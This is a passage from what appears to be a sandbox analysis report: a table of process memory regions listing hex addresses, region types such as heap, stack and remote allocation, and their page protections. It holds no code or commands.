page read and write
|
||
|
1A86022E000
|
heap
|
page read and write
|
||
|
2090011F000
|
trusted library allocation
|
page read and write
|
||
|
2854A101000
|
heap
|
page read and write
|
||
|
591F000
|
stack
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
2B8BCD31000
|
heap
|
page read and write
|
||
|
1A860235000
|
heap
|
page read and write
|
||
|
1A86056B000
|
heap
|
page read and write
|
||
|
1A86062A000
|
heap
|
page read and write
|
||
|
2854A301000
|
heap
|
page read and write
|
||
|
2854A260000
|
heap
|
page read and write
|
||
|
2096D470000
|
heap
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
5F51000
|
trusted library allocation
|
page read and write
|
||
|
1A860EF0000
|
heap
|
page read and write
|
||
|
1A85E509000
|
heap
|
page read and write
|
||
|
40C000
|
remote allocation
|
page execute and read and write
|
||
|
209003E5000
|
trusted library allocation
|
page read and write
|
||
|
18B264A0000
|
heap
|
page read and write
|
||
|
2090040B000
|
trusted library allocation
|
page read and write
|
||
|
2096F466000
|
heap
|
page read and write
|
||
|
2B8BCA60000
|
heap
|
page read and write
|
||
|
1A85E531000
|
heap
|
page read and write
|
||
|
18B26480000
|
heap
|
page read and write
|
||
|
FC57DFE000
|
stack
|
page read and write
|
||
|
2854A200000
|
heap
|
page read and write
|
||
|
1C5863A4000
|
trusted library allocation
|
page read and write
|
||
|
18B28400000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
209005FE000
|
trusted library allocation
|
page read and write
|
||
|
18B28301000
|
heap
|
page read and write
|
||
|
18B28468000
|
heap
|
page read and write
|
||
|
6430000
|
trusted library allocation
|
page execute and read and write
|
||
|
209005B4000
|
trusted library allocation
|
page read and write
|
||
|
1663000
|
heap
|
page read and write
|
||
|
18B28401000
|
heap
|
page read and write
|
||
|
2854A217000
|
heap
|
page read and write
|
||
|
2B8BCA37000
|
heap
|
page read and write
|
||
|
18B2842B000
|
heap
|
page read and write
|
||
|
18B28500000
|
heap
|
page read and write
|
||
|
1A860ED8000
|
heap
|
page read and write
|
||
|
1C58535F000
|
trusted library allocation
|
page read and write
|
||
|
18B283E4000
|
heap
|
page read and write
|
||
|
1A8610D8000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1C583CFC000
|
trusted library allocation
|
page read and write
|
||
|
2096EE30000
|
heap
|
page readonly
|
||
|
7FFD9B700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8610E9000
|
heap
|
page read and write
|
||
|
101D4FF000
|
stack
|
page read and write
|
||
|
20675C20000
|
heap
|
page read and write
|
||
|
2B8BCA6B000
|
heap
|
page read and write
|
||
|
2096F580000
|
heap
|
page execute and read and write
|
||
|
1A86023C000
|
heap
|
page read and write
|
||
|
1C585DA2000
|
trusted library allocation
|
page read and write
|
||
|
2090046E000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
18B26520000
|
heap
|
page read and write
|
||
|
2854A1E2000
|
heap
|
page read and write
|
||
|
18B2654A000
|
heap
|
page read and write
|
||
|
61CD000
|
stack
|
page read and write
|
||
|
18B26670000
|
heap
|
page read and write
|
||
|
1A86062A000
|
heap
|
page read and write
|
||
|
2B8BCA9A000
|
heap
|
page read and write
|
||
|
2096F423000
|
heap
|
page read and write
|
||
|
1A860645000
|
heap
|
page read and write
|
||
|
2854A300000
|
heap
|
page read and write
|
||
|
1A86022E000
|
heap
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
1A85E55C000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B8BCA1F000
|
heap
|
page read and write
|
||
|
2B8BAB60000
|
heap
|
page read and write
|
||
|
1A860591000
|
heap
|
page read and write
|
||
|
1670000
|
trusted library allocation
|
page read and write
|
||
|
2854A24C000
|
heap
|
page read and write
|
||
|
1A85E562000
|
heap
|
page read and write
|
||
|
1C5860FF000
|
trusted library allocation
|
page read and write
|
||
|
28548284000
|
heap
|
page read and write
|
||
|
5F3E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
285481A0000
|
heap
|
page read and write
|
||
|
18B283E4000
|
heap
|
page read and write
|
||
|
7425FE000
|
stack
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
1A85E4D8000
|
heap
|
page read and write
|
||
|
2096F5D0000
|
heap
|
page read and write
|
||
|
4D9533B000
|
stack
|
page read and write
|
||
|
645DB4E000
|
stack
|
page read and write
|
||
|
20900001000
|
trusted library allocation
|
page read and write
|
||
|
1A860AD0000
|
trusted library allocation
|
page read and write
|
||
|
1A861057000
|
heap
|
page read and write
|
||
|
4D94CFD000
|
stack
|
page read and write
|
||
|
18B28461000
|
heap
|
page read and write
|
||
|
2B8BCA11000
|
heap
|
page read and write
|
||
|
18B28404000
|
heap
|
page read and write
|
||
|
206759A0000
|
heap
|
page read and write
|
||
|
18B28428000
|
heap
|
page read and write
|
||
|
7426FD000
|
stack
|
page read and write
|
||
|
5F42000
|
trusted library allocation
|
page read and write
|
||
|
18B28701000
|
heap
|
page read and write
|
||
|
645CF7E000
|
stack
|
page read and write
|
||
|
2854A70F000
|
heap
|
page read and write
|
||
|
18B26549000
|
heap
|
page read and write
|
||
|
4D94A73000
|
stack
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
5F34000
|
trusted library allocation
|
page read and write
|
||
|
1C590CFA000
|
trusted library allocation
|
page read and write
|
||
|
2854A230000
|
heap
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
1C5902FA000
|
trusted library allocation
|
page read and write
|
||
|
20900130000
|
trusted library allocation
|
page read and write
|
||
|
2854A21C000
|
heap
|
page read and write
|
||
|
2096D472000
|
heap
|
page read and write
|
||
|
2096D4A7000
|
heap
|
page read and write
|
||
|
2854826C000
|
heap
|
page read and write
|
||
|
2B8BAB7B000
|
heap
|
page read and write
|
||
|
2854825F000
|
heap
|
page read and write
|
||
|
20675C24000
|
heap
|
page read and write
|
||
|
2854826C000
|
heap
|
page read and write
|
||
|
1A85E562000
|
heap
|
page read and write
|
||
|
101D8FF000
|
stack
|
page read and write
|
||
|
1A8610F1000
|
heap
|
page read and write
|
||
|
32DE000
|
trusted library allocation
|
page read and write
|
||
|
2854A228000
|
heap
|
page read and write
|
||
|
1A85E59E000
|
heap
|
page read and write
|
||
|
1A860690000
|
heap
|
page read and write
|
||
|
5CAE000
|
stack
|
page read and write
|
||
|
2096D5B0000
|
heap
|
page read and write
|
||
|
1A8610EB000
|
heap
|
page read and write
|
||
|
5FDE000
|
stack
|
page read and write
|
||
|
1A85E560000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
2090009E000
|
trusted library allocation
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
2854A240000
|
heap
|
page read and write
|
||
|
1A860F4F000
|
heap
|
page read and write
|
||
|
FC57BFF000
|
stack
|
page read and write
|
||
|
2B8BCA44000
|
heap
|
page read and write
|
||
|
2B8BCA36000
|
heap
|
page read and write
|
||
|
1A85E4FC000
|
heap
|
page read and write
|
||
|
742FFF000
|
stack
|
page read and write
|
||
|
15EB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2854824B000
|
heap
|
page read and write
|
||
|
1C590010000
|
trusted library allocation
|
page read and write
|
||
|
2854A208000
|
heap
|
page read and write
|
||
|
18B28402000
|
heap
|
page read and write
|
||
|
18B28410000
|
heap
|
page read and write
|
||
|
1C585F76000
|
trusted library allocation
|
page read and write
|
||
|
18B2655D000
|
heap
|
page read and write
|
||
|
2854A304000
|
heap
|
page read and write
|
||
|
F628CFE000
|
stack
|
page read and write
|
||
|
2096EEF6000
|
heap
|
page read and write
|
||
|
18B28434000
|
heap
|
page read and write
|
||
|
1A8605D7000
|
heap
|
page read and write
|
||
|
1C583597000
|
trusted library allocation
|
page read and write
|
||
|
FC57CFF000
|
stack
|
page read and write
|
||
|
1A860222000
|
heap
|
page read and write
|
||
|
28548480000
|
heap
|
page read and write
|
||
|
18B2653B000
|
heap
|
page read and write
|
||
|
2B8BCA91000
|
heap
|
page read and write
|
||
|
7428FF000
|
stack
|
page read and write
|
||
|
F6288FF000
|
stack
|
page read and write
|
||
|
42A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1A86023E000
|
heap
|
page read and write
|
||
|
2B8BCA5B000
|
heap
|
page read and write
|
||
|
1C583D4F000
|
trusted library allocation
|
page read and write
|
||
|
1C585D5F000
|
trusted library allocation
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
18B2843B000
|
heap
|
page read and write
|
||
|
2B8BAB00000
|
heap
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
6A90000
|
heap
|
page read and write
|
||
|
2096D42B000
|
heap
|
page read and write
|
||
|
1A8605CC000
|
heap
|
page read and write
|
||
|
2096EE20000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA98000
|
heap
|
page read and write
|
||
|
18B28407000
|
heap
|
page read and write
|
||
|
2854C0C0000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA77000
|
heap
|
page read and write
|
||
|
285481B0000
|
heap
|
page read and write
|
||
|
20900059000
|
trusted library allocation
|
page read and write
|
||
|
20900122000
|
trusted library allocation
|
page read and write
|
||
|
42C9000
|
trusted library allocation
|
page read and write
|
||
|
645D17B000
|
stack
|
page read and write
|
||
|
2B8BCA0E000
|
heap
|
page read and write
|
||
|
5F79000
|
trusted library allocation
|
page read and write
|
||
|
206759F0000
|
heap
|
page read and write
|
||
|
18B28407000
|
heap
|
page read and write
|
||
|
1C590071000
|
trusted library allocation
|
page read and write
|
||
|
18B27FB0000
|
heap
|
page read and write
|
||
|
2096F4C2000
|
heap
|
page read and write
|
||
|
1A86024F000
|
heap
|
page read and write
|
||
|
2B8BAB68000
|
heap
|
page read and write
|
||
|
1A860266000
|
heap
|
page read and write
|
||
|
18B266C5000
|
heap
|
page read and write
|
||
|
7FFD9B7F4000
|
trusted library allocation
|
page read and write
|
||
|
1A8605F6000
|
heap
|
page read and write
|
||
|
2096F41E000
|
heap
|
page read and write
|
||
|
1A86023C000
|
heap
|
page read and write
|
||
|
1A8604F0000
|
remote allocation
|
page read and write
|
||
|
645CC7E000
|
stack
|
page read and write
|
||
|
18B28909000
|
heap
|
page read and write
|
||
|
5CF0000
|
heap
|
page read and write
|
||
|
FC578FF000
|
stack
|
page read and write
|
||
|
5F36000
|
trusted library allocation
|
page read and write
|
||
|
1A8605CC000
|
heap
|
page read and write
|
||
|
1480000
|
heap
|
page read and write
|
||
|
1A86024A000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
4D94DFE000
|
stack
|
page read and write
|
||
|
2854A217000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2854A267000
|
heap
|
page read and write
|
||
|
1A85E536000
|
heap
|
page read and write
|
||
|
164E000
|
stack
|
page read and write
|
||
|
1C582197000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page execute and read and write
|
||
|
2090057E000
|
trusted library allocation
|
page read and write
|
||
|
D1AC5FE000
|
unkown
|
page read and write
|
||
|
2096F5B0000
|
heap
|
page read and write
|
||
|
645CEFC000
|
stack
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
2B8BACB0000
|
heap
|
page read and write
|
||
|
62CC000
|
stack
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
2096EE40000
|
trusted library allocation
|
page read and write
|
||
|
18B28420000
|
heap
|
page read and write
|
||
|
20900119000
|
trusted library allocation
|
page read and write
|
||
|
18B28300000
|
heap
|
page read and write
|
||
|
2B8BCB30000
|
heap
|
page read and write
|
||
|
20900716000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
2854A204000
|
heap
|
page read and write
|
||
|
1A85E625000
|
heap
|
page read and write
|
||
|
1A85E537000
|
heap
|
page read and write
|
||
|
1C580223000
|
trusted library allocation
|
page read and write
|
||
|
1A860221000
|
heap
|
page read and write
|
||
|
1A861096000
|
heap
|
page read and write
|
||
|
2B8BCA32000
|
heap
|
page read and write
|
||
|
1A860EF1000
|
heap
|
page read and write
|
||
|
1A8610EE000
|
heap
|
page read and write
|
||
|
1A85E4ED000
|
heap
|
page read and write
|
||
|
1A860EF7000
|
heap
|
page read and write
|
||
|
5D00000
|
heap
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
28548238000
|
heap
|
page read and write
|
||
|
1A860591000
|
heap
|
page read and write
|
||
|
1A861043000
|
heap
|
page read and write
|
||
|
2854A234000
|
heap
|
page read and write
|
||
|
2854A5D5000
|
heap
|
page read and write
|
||
|
101D7FE000
|
stack
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2B8BCA58000
|
heap
|
page read and write
|
||
|
2096F4F0000
|
heap
|
page read and write
|
||
|
7FFD9B7FA000
|
trusted library allocation
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
1A8605FA000
|
heap
|
page read and write
|
||
|
1A860F43000
|
heap
|
page read and write
|
||
|
1A86059C000
|
heap
|
page read and write
|
||
|
2854A247000
|
heap
|
page read and write
|
||
|
1A861045000
|
heap
|
page read and write
|
||
|
2B8BCA70000
|
heap
|
page read and write
|
||
|
645C703000
|
stack
|
page read and write
|
||
|
1A85E55A000
|
heap
|
page read and write
|
||
|
18B28406000
|
heap
|
page read and write
|
||
|
1A8605D6000
|
heap
|
page read and write
|
||
|
1A860230000
|
heap
|
page read and write
|
||
|
1C585F7A000
|
trusted library allocation
|
page read and write
|
||
|
28548259000
|
heap
|
page read and write
|
||
|
2B8BCA30000
|
heap
|
page read and write
|
||
|
15B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2096D407000
|
heap
|
page read and write
|
||
|
7FFD9B6F6000
|
trusted library allocation
|
page read and write
|
||
|
1A8604F0000
|
remote allocation
|
page read and write
|
||
|
5FE0000
|
trusted library allocation
|
page read and write
|
||
|
32F9000
|
trusted library allocation
|
page read and write
|
||
|
1A86062A000
|
heap
|
page read and write
|
||
|
2854826C000
|
heap
|
page read and write
|
||
|
2090011C000
|
trusted library allocation
|
page read and write
|
||
|
18B266C0000
|
heap
|
page read and write
|
||
|
2B8BCF3C000
|
heap
|
page read and write
|
||
|
1A86022E000
|
heap
|
page read and write
|
||
|
645D0FE000
|
stack
|
page read and write
|
||
|
285481D0000
|
heap
|
page read and write
|
||
|
16C1000
|
heap
|
page read and write
|
||
|
645C7CE000
|
stack
|
page read and write
|
||
|
2854A1E6000
|
heap
|
page read and write
|
||
|
602D000
|
stack
|
page read and write
|
||
|
1A85E53D000
|
heap
|
page read and write
|
||
|
1A85E490000
|
heap
|
page read and write
|
||
|
5F4E000
|
trusted library allocation
|
page read and write
|
||
|
6411000
|
trusted library allocation
|
page read and write
|
||
|
101D9FE000
|
stack
|
page read and write
|
||
|
1A85E570000
|
heap
|
page read and write
|
||
|
309C000
|
stack
|
page read and write
|
||
|
1600000
|
trusted library allocation
|
page read and write
|
||
|
20675AF0000
|
heap
|
page read and write
|
||
|
2B8BAB80000
|
heap
|
page read and write
|
||
|
2096D3EF000
|
heap
|
page read and write
|
||
|
1A86023A000
|
heap
|
page read and write
|
||
|
15A0000
|
trusted library allocation
|
page read and write
|
||
|
1A86059C000
|
heap
|
page read and write
|
||
|
16BF000
|
heap
|
page read and write
|
||
|
2096D429000
|
heap
|
page read and write
|
||
|
645CAFE000
|
stack
|
page read and write
|
||
|
1A86022A000
|
heap
|
page read and write
|
||
|
28548434000
|
heap
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
6400000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
7FFD9B6FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B2656B000
|
heap
|
page read and write
|
||
|
645CB7D000
|
stack
|
page read and write
|
||
|
2096D437000
|
heap
|
page read and write
|
||
|
18B28700000
|
heap
|
page read and write
|
||
|
FC57AFF000
|
stack
|
page read and write
|
||
|
1A8605EA000
|
heap
|
page read and write
|
||
|
1A85E546000
|
heap
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
2B8BAB9C000
|
heap
|
page read and write
|
||
|
32FB000
|
trusted library allocation
|
page read and write
|
||
|
2854A20C000
|
heap
|
page read and write
|
||
|
1A860F42000
|
heap
|
page read and write
|
||
|
D1AC4FD000
|
stack
|
page read and write
|
||
|
2854826A000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
742DFE000
|
stack
|
page read and write
|
||
|
2B8BCA47000
|
heap
|
page read and write
|
||
|
18B283E0000
|
heap
|
page read and write
|
||
|
20910010000
|
trusted library allocation
|
page read and write
|
||
|
1A860EE1000
|
heap
|
page read and write
|
||
|
2854A26B000
|
heap
|
page read and write
|
||
|
2B8BCA6B000
|
heap
|
page read and write
|
||
|
2096F42D000
|
heap
|
page read and write
|
||
|
2B8BCA3C000
|
heap
|
page read and write
|
||
|
101D5FF000
|
stack
|
page read and write
|
||
|
18B26540000
|
heap
|
page read and write
|
||
|
2096D5D0000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1A8610F7000
|
heap
|
page read and write
|
||
|
645CCFD000
|
stack
|
page read and write
|
||
|
2096EE90000
|
heap
|
page read and write
|
||
|
2096D7A0000
|
heap
|
page read and write
|
||
|
1A85E509000
|
heap
|
page read and write
|
||
|
1A860F42000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1C58007D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
2096FA10000
|
heap
|
page read and write
|
||
|
206758A0000
|
heap
|
page read and write
|
||
|
1A85E4B0000
|
heap
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
1A85E55A000
|
heap
|
page read and write
|
||
|
2854826C000
|
heap
|
page read and write
|
||
|
5E2A000
|
stack
|
page read and write
|
||
|
2854825F000
|
heap
|
page read and write
|
||
|
209003D3000
|
trusted library allocation
|
page read and write
|
||
|
1A86062A000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
1C5803E4000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page execute and read and write
|
||
|
1A860F7C000
|
heap
|
page read and write
|
||
|
645C78E000
|
stack
|
page read and write
|
||
|
1A86059D000
|
heap
|
page read and write
|
||
|
2B8BAA20000
|
heap
|
page read and write
|
||
|
1C585EAF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1A8605A8000
|
heap
|
page read and write
|
||
|
2854A1E2000
|
heap
|
page read and write
|
||
|
1A85E4FC000
|
heap
|
page read and write
|
||
|
1C583F5F000
|
trusted library allocation
|
page read and write
|
||
|
1A8606E5000
|
heap
|
page read and write
|
||
|
1A85E550000
|
heap
|
page read and write
|
||
|
1A860231000
|
heap
|
page read and write
|
||
|
18B28417000
|
heap
|
page read and write
|
||
|
2B8BCA47000
|
heap
|
page read and write
|
||
|
1A8610FA000
|
heap
|
page read and write
|
||
|
1C582B97000
|
trusted library allocation
|
page read and write
|
||
|
742AFF000
|
stack
|
page read and write
|
||
|
1A860ED0000
|
heap
|
page read and write
|
||
|
1A860550000
|
heap
|
page read and write
|
||
|
20900125000
|
trusted library allocation
|
page read and write
|
||
|
1A860FAD000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2854A22B000
|
heap
|
page read and write
|
||
|
1A8610D0000
|
heap
|
page read and write
|
||
|
1A85E53C000
|
heap
|
page read and write
|
||
|
1A860266000
|
heap
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
2B8BCB35000
|
heap
|
page read and write
|
||
|
1A85E567000
|
heap
|
page read and write
|
||
|
1A85E545000
|
heap
|
page read and write
|
||
|
15E7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2854A100000
|
heap
|
page read and write
|
||
|
2096D47B000
|
heap
|
page read and write
|
||
|
2090016F000
|
trusted library allocation
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2096D3D0000
|
heap
|
page read and write
|
||
|
645CE78000
|
stack
|
page read and write
|
||
|
18B2846A000
|
heap
|
page read and write
|
||
|
2B8BCA31000
|
heap
|
page read and write
|
||
|
742CFD000
|
stack
|
page read and write
|
||
|
5CB0000
|
trusted library allocation
|
page read and write
|
||
|
2096D449000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2854A1DE000
|
heap
|
page read and write
|
||
|
645CA7F000
|
stack
|
page read and write
|
||
|
7FFD9B7F1000
|
trusted library allocation
|
page read and write
|
||
|
206759C0000
|
direct allocation
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2B8BAB9A000
|
heap
|
page read and write
|
||
|
1A8605A2000
|
heap
|
page read and write
|
||
|
2B8BE940000
|
trusted library allocation
|
page read and write
|
||
|
1A860F42000
|
heap
|
page read and write
|
||
|
32D6000
|
trusted library allocation
|
page read and write
|
||
|
2096D7C0000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
28548250000
|
heap
|
page read and write
|
||
|
1A860598000
|
heap
|
page read and write
|
||
|
101D6FF000
|
stack
|
page read and write
|
||
|
4D94AFE000
|
stack
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
|
1A85E59E000
|
heap
|
page read and write
|
||
|
2096EEF0000
|
heap
|
page read and write
|
||
|
2096F4EE000
|
heap
|
page read and write
|
||
|
2B8BAD55000
|
heap
|
page read and write
|
||
|
1650000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A85E58C000
|
heap
|
page read and write
|
||
|
15E2000
|
trusted library allocation
|
page read and write
|
||
|
18B28505000
|
heap
|
page read and write
|
||
|
7FFD9B64D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
2B8BAB20000
|
heap
|
page read and write
|
||
|
4D952BF000
|
stack
|
page read and write
|
||
|
1A85E56E000
|
heap
|
page read and write
|
||
|
2096D431000
|
heap
|
page read and write
|
||
|
1A8610EB000
|
heap
|
page read and write
|
||
|
2854A304000
|
heap
|
page read and write
|
||
|
7431FC000
|
stack
|
page read and write
|
||
|
63F0000
|
heap
|
page read and write
|
||
|
1C583F5B000
|
trusted library allocation
|
page read and write
|
||
|
2854A501000
|
heap
|
page read and write
|
||
|
4D94E7F000
|
stack
|
page read and write
|
||
|
1A860F25000
|
heap
|
page read and write
|
||
|
1485000
|
heap
|
page read and write
|
||
|
1A85E531000
|
heap
|
page read and write
|
||
|
206759FB000
|
heap
|
page read and write
|
||
|
15CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
F628BFF000
|
stack
|
page read and write
|
||
|
2096F419000
|
heap
|
page read and write
|
||
|
7DF4F41C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A85E538000
|
heap
|
page read and write
|
||
|
2B8BAD00000
|
heap
|
page read and write
|
||
|
1A860225000
|
heap
|
page read and write
|
||
|
1A85E570000
|
heap
|
page read and write
|
||
|
1A860248000
|
heap
|
page read and write
|
||
|
1C5916FA000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA34000
|
heap
|
page read and write
|
||
|
18B2840C000
|
heap
|
page read and write
|
||
|
1A85E531000
|
heap
|
page read and write
|
||
|
FC575CA000
|
stack
|
page read and write
|
||
|
18B2844D000
|
heap
|
page read and write
|
||
|
2B8BCA47000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
1A860645000
|
heap
|
page read and write
|
||
|
5F56000
|
trusted library allocation
|
page read and write
|
||
|
2B8BC930000
|
heap
|
page read and write
|
||
|
1A860970000
|
heap
|
page read and write
|
||
|
1C5803E8000
|
trusted library allocation
|
page read and write
|
||
|
20900133000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
18B28430000
|
heap
|
page read and write
|
||
|
16B4000
|
heap
|
page read and write
|
||
|
2096F414000
|
heap
|
page read and write
|
||
|
1A860EFE000
|
heap
|
page read and write
|
||
|
1A8610D5000
|
heap
|
page read and write
|
||
|
2096EE80000
|
heap
|
page execute and read and write
|
||
|
1A8604F0000
|
remote allocation
|
page read and write
|
||
|
1A860800000
|
heap
|
page read and write
|
||
|
1A860224000
|
heap
|
page read and write
|
||
|
2854A1D5000
|
heap
|
page read and write
|
||
|
2B8BCA11000
|
heap
|
page read and write
|
||
|
28548277000
|
heap
|
page read and write
|
||
|
2854A1E2000
|
heap
|
page read and write
|
||
|
28548525000
|
heap
|
page read and write
|
||
|
18B283D5000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
1A860569000
|
heap
|
page read and write
|
||
|
1A860645000
|
heap
|
page read and write
|
||
|
2B8BACB4000
|
heap
|
page read and write
|
||
|
2B8BCA98000
|
heap
|
page read and write
|
||
|
7FFD9B650000
|
trusted library allocation
|
page read and write
|
||
|
15B4000
|
trusted library allocation
|
page read and write
|
||
|
20900568000
|
trusted library allocation
|
page read and write
|
||
|
15C3000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA40000
|
heap
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
1A8605A7000
|
heap
|
page read and write
|
||
|
2854A217000
|
heap
|
page read and write
|
||
|
1A85E5D0000
|
heap
|
page read and write
|
||
|
2B8BCA5B000
|
heap
|
page read and write
|
||
|
18B283E4000
|
heap
|
page read and write
|
||
|
2854A207000
|
heap
|
page read and write
|
||
|
20910071000
|
trusted library allocation
|
page read and write
|
||
|
20675C25000
|
heap
|
page read and write
|
||
|
2096D494000
|
heap
|
page read and write
|
||
|
2854A206000
|
heap
|
page read and write
|
||
|
1A860591000
|
heap
|
page read and write
|
||
|
5920000
|
heap
|
page execute and read and write
|
||
|
2090012D000
|
trusted library allocation
|
page read and write
|
||
|
2854A1E6000
|
heap
|
page read and write
|
||
|
2B8BAD50000
|
heap
|
page read and write
|
||
|
4D951BF000
|
stack
|
page read and write
|
||
|
2854A253000
|
heap
|
page read and write
|
||
|
15D0000
|
trusted library allocation
|
page read and write
|
||
|
645D07E000
|
stack
|
page read and write
|
||
|
2B8BCA50000
|
heap
|
page read and write
|
||
|
4D94BBF000
|
stack
|
page read and write
|
||
|
2096D3E0000
|
heap
|
page read and write
|
||
|
28548520000
|
heap
|
page read and write
|
||
|
1A85E4D7000
|
heap
|
page read and write
|
||
|
2854A22B000
|
heap
|
page read and write
|
||
|
5BAD000
|
stack
|
page read and write
|
||
|
5B6E000
|
stack
|
page read and write
|
||
|
2B8BCA4C000
|
heap
|
page read and write
|
||
|
1A8610EB000
|
heap
|
page read and write
|
||
|
2096F410000
|
heap
|
page read and write
|
||
|
2854826C000
|
heap
|
page read and write
|
||
|
1A85E58C000
|
heap
|
page read and write
|
||
|
1A860225000
|
heap
|
page read and write
|
||
|
1A85E55C000
|
heap
|
page read and write
|
||
|
2854A306000
|
heap
|
page read and write
|
||
|
18B28440000
|
heap
|
page read and write
|
||
|
5F62000
|
trusted library allocation
|
page read and write
|
||
|
1A85E560000
|
heap
|
page read and write
|
||
|
15BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B2655B000
|
heap
|
page read and write
|
||
|
2854A500000
|
heap
|
page read and write
|
||
|
7FFD9B65C000
|
trusted library allocation
|
page read and write
|
||
|
18B26540000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2854A23B000
|
heap
|
page read and write
|
||
|
1C58495F000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCD30000
|
heap
|
page read and write
|
||
|
18B28447000
|
heap
|
page read and write
|
||
|
1A8610D1000
|
heap
|
page read and write
|
||
|
20910001000
|
trusted library allocation
|
page read and write
|
||
|
2B8BCA6B000
|
heap
|
page read and write
|
||
|
1A860248000
|
heap
|
page read and write
|
||
|
15B0000
|
trusted library allocation
|
page read and write
|
||
|
1C583F4C000
|
trusted library allocation
|
page read and write
|
||
|
1A860250000
|
heap
|
page read and write
|
||
|
18B287D5000
|
heap
|
page read and write
|
||
|
168B000
|
heap
|
page read and write
|
||
|
1A860236000
|
heap
|
page read and write
|
||
|
18B26528000
|
heap
|
page read and write
|
||
|
2854A214000
|
heap
|
page read and write
|
||
|
2096D7C5000
|
heap
|
page read and write
|
||
|
1A860EED000
|
heap
|
page read and write
|
||
|
1A8610E6000
|
heap
|
page read and write
|
||
|
101D13A000
|
stack
|
page read and write
|
||
|
645CDF7000
|
stack
|
page read and write
|
||
|
1A86024C000
|
heap
|
page read and write
|
||
|
645CD79000
|
stack
|
page read and write
|
||
|
18B263A0000
|
heap
|
page read and write
|
||
|
1C580D97000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
